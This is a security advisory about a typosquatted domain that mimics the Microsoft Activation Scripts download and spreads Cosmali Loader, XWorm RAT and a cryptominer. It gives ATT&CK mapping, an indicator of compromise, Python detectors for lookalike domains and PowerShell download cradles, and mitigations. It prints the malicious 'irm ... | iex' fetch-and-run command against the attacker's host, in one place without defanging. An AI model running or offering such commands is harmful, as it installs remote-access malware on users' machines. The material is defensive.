Typo in Windows Activation Script Leads to Cosmali Loader Malware Infection

Typosquatted Domain Impersonating Microsoft Activation Scripts (MAS) Delivers Cosmali Loader and XWorm RAT

Severity: MEDIUM
December 27, 2025
Categories: Malware, Phishing, Threat Actor

Related Entities

Products & Tech: Microsoft Activation Scripts (MAS), PowerShell

Other: Cosmali Loader, XWorm RAT

Full Report

Executive Summary

A clever typosquatting campaign is exploiting users of an unofficial but popular open-source tool, Microsoft Activation Scripts (MAS), to distribute malware. Researchers reported on December 26, 2025, that threat actors registered a domain, get.activate[.]win, that mimics the legitimate MAS domain by omitting a single letter. Users who make this common typo while executing the activation script in PowerShell are unknowingly infected with Cosmali Loader. The loader then deploys secondary payloads: the XWorm Remote Access Trojan (RAT), which grants attackers full remote control, and cryptocurrency mining software. The incident highlights the inherent risks of using grey-area tools and the effectiveness of typosquatting as a malware delivery vector.

Threat Overview

The attack preys on human error. The legitimate way to run the MAS script is a PowerShell one-liner that downloads and executes a script from get.activated.win. The attackers registered get.activate[.]win, the same name with the 'd' omitted.

  • Attack Vector: Typosquatting, a form of social engineering that relies on users making typographical errors.
  • Execution: When a user runs the command irm https://get.activate[.]win | iex, they connect not to the official MAS project but to the attacker's server.
  • Payload: The server delivers the Cosmali Loader, which establishes persistence and then downloads further malware.
  • Final Stage: The loader deploys the XWorm RAT for remote control and a cryptominer for resource hijacking.
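The one-letter omission described above generalizes: every single-character omission or adjacent-character transposition of a legitimate download domain is a candidate typosquat that a defender can watch for in advance. The following Python is an added example, not part of the report or of the MAS project: it enumerates those lookalikes for the genuine MAS domain get.activated.win and flags matching queries in a few constructed DNS log lines. The log format (timestamp, client address, query name) is an assumption made for the example.

```python
"""Typosquat watch for a legitimate download domain (added example, not from
the report or the MAS project). Given the genuine domain the report names,
get.activated.win, it generates single-edit lookalikes (one character omitted,
one adjacent pair swapped) and flags DNS/proxy log lines that resolve one of
them. The log lines below are constructed for this example."""
import re

LEGIT_DOMAIN = "get.activated.win"


def omission_variants(domain: str) -> set[str]:
    """Every string obtained by dropping exactly one non-dot character."""
    return {domain[:i] + domain[i + 1:] for i, c in enumerate(domain) if c != "."}


def transposition_variants(domain: str) -> set[str]:
    """Every string obtained by swapping one adjacent pair of non-dot characters."""
    out = set()
    for i in range(len(domain) - 1):
        a, b = domain[i], domain[i + 1]
        if a != b and "." not in (a, b):
            out.add(domain[:i] + b + a + domain[i + 2:])
    return out


def lookalikes(domain: str) -> set[str]:
    """Union of both edit classes; never contains the genuine domain itself."""
    return omission_variants(domain) | transposition_variants(domain)


# Constructed sample: one DNS query per line as "timestamp client qname".
SAMPLE_DNS_LOG = """\
2025-12-26T10:01:02Z 10.0.0.12 get.activated.win
2025-12-26T10:01:09Z 10.0.0.12 github.com
2025-12-26T10:04:41Z 10.0.0.17 get.activate.win
2025-12-26T10:05:03Z 10.0.0.21 get.actiavted.win
2025-12-26T10:05:30Z 10.0.0.21 microsoft.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def find_lookalike_queries(log_text: str, legit: str = LEGIT_DOMAIN) -> list[dict]:
    """Return one record per log line whose query name is a lookalike of `legit`."""
    watch = lookalikes(legit)
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        ts, client, qname = m.groups()
        qname = qname.lower().rstrip(".")  # normalise case and a trailing root dot
        if qname in watch:
            hits.append({"time": ts, "client": client, "qname": qname})
    return hits


if __name__ == "__main__":
    for hit in find_lookalike_queries(SAMPLE_DNS_LOG):
        print(f"{hit['time']} {hit['client']} queried lookalike {hit['qname']}")
```

The watch set is small (a few dozen names for a domain of this length), so it can be loaded straight into a DNS resolver's response-policy zone or a proxy blocklist before any of the names is registered, which is the proactive form of the URL analysis the Detection section recommends.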

An unusual aspect of this campaign is that some victims reported receiving a pop-up window that stated, "You are infected with Cosmali Loader malware because you mistyped the domain name," and advised a full Windows reinstall. Security experts speculate this message was not from the attackers but from a vigilante hacker or researcher who compromised the malware's insecure command-and-control (C2) server and used it to warn victims.

Technical Analysis

  1. Initial Access & Execution (T1204.002 - User Execution): The user voluntarily executes the malicious command in PowerShell.
  2. Masquerading (T1036.005 - Match Legitimate Name or Location): The domain get.activate[.]win is designed to look nearly identical to the legitimate one, tricking the user.
  3. Ingress Tool Transfer (T1105): The irm (Invoke-RestMethod) command downloads the initial malware script from the malicious domain.
  4. Command and Scripting Interpreter (T1059.001 - PowerShell): The entire attack is initiated and executed via PowerShell, a powerful tool often abused by malware.
  5. XWorm RAT Capabilities: Once deployed, XWorm provides the attacker with full RAT capabilities, including keylogging, file transfer, remote shell access, and credential theft.

Impact Assessment

Although the campaign targets users of a legally questionable tool, the impact can still be severe. Once infected with XWorm RAT, the victim's machine is completely compromised. The attacker can:

  • Steal personal data, including banking credentials, social media passwords, and private files.
  • Use the compromised machine as part of a botnet for DDoS attacks or further malware distribution.
  • Hijack system resources to mine cryptocurrency, leading to high electricity costs and degraded performance.
  • Use the machine as a pivot point to attack other systems if it is on a corporate network.

IOCs

Type     Value               Description
domain   get.activate[.]win  The malicious typosquatted domain used to distribute the malware.

Detection & Response

  1. DNS/Proxy Log Analysis: Monitor for any connections to the malicious domain get.activate[.]win. This is a high-fidelity indicator of compromise. This is an application of D3-UA: URL Analysis.
  2. PowerShell Script Block Logging: Enable PowerShell logging (Module Logging, Script Block Logging) to capture the commands being executed. Review logs for the use of irm or iex fetching scripts from suspicious or unknown domains.
  3. Endpoint Monitoring: Use an EDR solution to detect the behaviors of Cosmali Loader and XWorm RAT, such as creating persistence mechanisms (e.g., scheduled tasks, registry run keys) and injecting into legitimate processes.
  4. Network Monitoring: Monitor for C2 traffic associated with XWorm or unexpected outbound connections from newly installed software.
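The script block review in step 2 can be automated rather than done by eye. The following Python is an added example, not from the report or from any vendor tooling: it runs a download-cradle rule over constructed stand-ins for the text of PowerShell Script Block Logging records (event 4104 in the Microsoft-Windows-PowerShell/Operational log), extracts the host each cradle fetches from, and compares it with an assumed allowlist of legitimate script sources (ALLOWED_HOSTS, a hypothetical value), so that an analyst sees only downloads from hosts the organisation does not recognise.

```python
"""Download-cradle detection over PowerShell Script Block Logging text.

Added example, not from the report. With Script Block Logging enabled, Windows
records each script block in the Microsoft-Windows-PowerShell/Operational log
as event 4104. The records below are constructed stand-ins for the exported
block text; the rule flags a web-download cmdlet (or one of its aliases) whose
output is piped into Invoke-Expression, extracts the host, and checks it
against an allowlist of sources this hypothetical organisation actually uses.
"""
import re
from dataclasses import dataclass

# Invoke-RestMethod / Invoke-WebRequest and the aliases Windows PowerShell 5.1
# defines for them (curl and wget are aliases there, not in PowerShell 7).
DOWNLOAD = r"\b(?:irm|iwr|curl|wget|Invoke-RestMethod|Invoke-WebRequest)\b"
CRADLE_RE = re.compile(
    DOWNLOAD
    + r"\s+(?:-Uri\s+)?['\"]?(?P<url>https?://[^\s'\"|)]+)['\"]?"
    + r"[^|\n]*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
HOST_RE = re.compile(r"^https?://([^/:?#]+)", re.IGNORECASE)

# Assumed allowlist of hosts this organisation expects scripts to be fetched from.
ALLOWED_HOSTS = {"raw.githubusercontent.com", "community.chocolatey.org"}


@dataclass
class Finding:
    user: str
    host: str
    script: str
    known_source: bool  # False means the host is not on the allowlist


# Constructed records: (account that ran the block, script block text).
SAMPLE_EVENTS = [
    ("LAB\\alice", "irm https://get.activate.win | iex"),
    ("LAB\\bob", "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/org/tool/main/install.ps1' | Invoke-Expression"),
    ("LAB\\carol", "Get-ChildItem C:\\Temp | Where-Object Length -gt 1MB"),
    ("LAB\\dave", "Confirm-SecureBootUEFI; Get-Service | Where-Object Status -eq Running"),
]


def find_cradles(events: list[tuple[str, str]]) -> list[Finding]:
    """Return one Finding per script block that pipes a web download into iex."""
    findings = []
    for user, script in events:
        m = CRADLE_RE.search(script)
        if not m:
            continue
        host = HOST_RE.match(m.group("url")).group(1).lower()
        findings.append(Finding(user, host, script, host in ALLOWED_HOSTS))
    return findings


def unknown_source_findings(events: list[tuple[str, str]]) -> list[Finding]:
    """The subset worth an analyst's time: cradles fetching from an unlisted host."""
    return [f for f in find_cradles(events) if not f.known_source]


if __name__ == "__main__":
    for f in unknown_source_findings(SAMPLE_EVENTS):
        print(f"{f.user} fetched and executed code from {f.host}: {f.script}")
```

The word boundaries around the alias names matter: without them the three-letter alias irm would fire on any block containing Confirm-*, which is exactly the kind of false positive that gets a rule switched off. In production the event text would come from Get-WinEvent or the SIEM rather than the inline list, and the allowlist from configuration.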

Mitigation

  1. User Education and Policy: The primary mitigation is to enforce policies against the use of illegal or unauthorized software and activation tools. Educate users on the risks associated with such tools, including malware infection.
  2. DNS Filtering/Web Security Gateway: Use a web security gateway to block access to known malicious and typosquatted domains. This would prevent the initial download of the malware. This is an example of D3-DNSDL: DNS Denylisting.
  3. Restrict PowerShell Usage: For standard user workstations, consider using PowerShell Constrained Language Mode to limit its ability to execute arbitrary scripts and commands. This is a form of D3-ACH: Application Configuration Hardening.
  4. Principle of Least Privilege: Ensure users do not have administrative privileges on their workstations. This can limit the malware's ability to establish persistence and deeply infect the system.

Timeline of Events

  • December 27, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Educate users about the dangers of typosquatting and the risks of using unauthorized software activation tools.
  • Use DNS filtering and web security gateways to block access to known malicious and typosquatted domains.
  • Use PowerShell Constrained Language Mode or other application control mechanisms to prevent the execution of arbitrary scripts.

D3FEND Defensive Countermeasures

To proactively block this attack vector, organizations should use a DNS filtering service or web security gateway that maintains a blocklist of known malicious and typosquatted domains. The domain get.activate[.]win should be immediately added to this list. These services can prevent the initial PowerShell command (irm) from ever reaching the attacker's server, breaking the infection chain at the earliest possible stage. This is a highly effective, low-overhead control that protects against a wide range of phishing and malware delivery campaigns, not just this specific one targeting MAS users.

Harden PowerShell configurations on user endpoints to prevent the execution of untrusted scripts. Deploy PowerShell Constrained Language Mode via Group Policy, which severely limits the commands and scripts that can be run. This would prevent the iex (Invoke-Expression) part of the attack from executing the downloaded malware script. Additionally, enforce a PowerShell execution policy of 'AllSigned' or 'RemoteSigned' to prevent arbitrary scripts from the internet from running. Note that execution policy governs script files on disk; a command piped straight into iex is not a file, so this setting complements Constrained Language Mode rather than replacing it. This hardening measure directly targets the execution phase of the attack and is a best practice for securing Windows environments against fileless malware and living-off-the-land attacks.

While not a technical control in the same vein, the most fundamental mitigation is strong user education and acceptable use policies. Organizations must clearly prohibit the use of unauthorized software, cracks, and activation tools. Conduct security awareness training that specifically covers the dangers of typosquatting and social engineering. Explain that such tools are a primary vector for malware like Cosmali Loader and XWorm RAT. A user who understands the risk is less likely to seek out and execute these commands in the first place, thus avoiding the threat entirely. This cultural and policy-based control is the first line of defense.


Article Author

Jason Gomes
• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Cosmali Loader, XWorm RAT, Typosquatting, Malware, PowerShell, Microsoft Activation Scripts
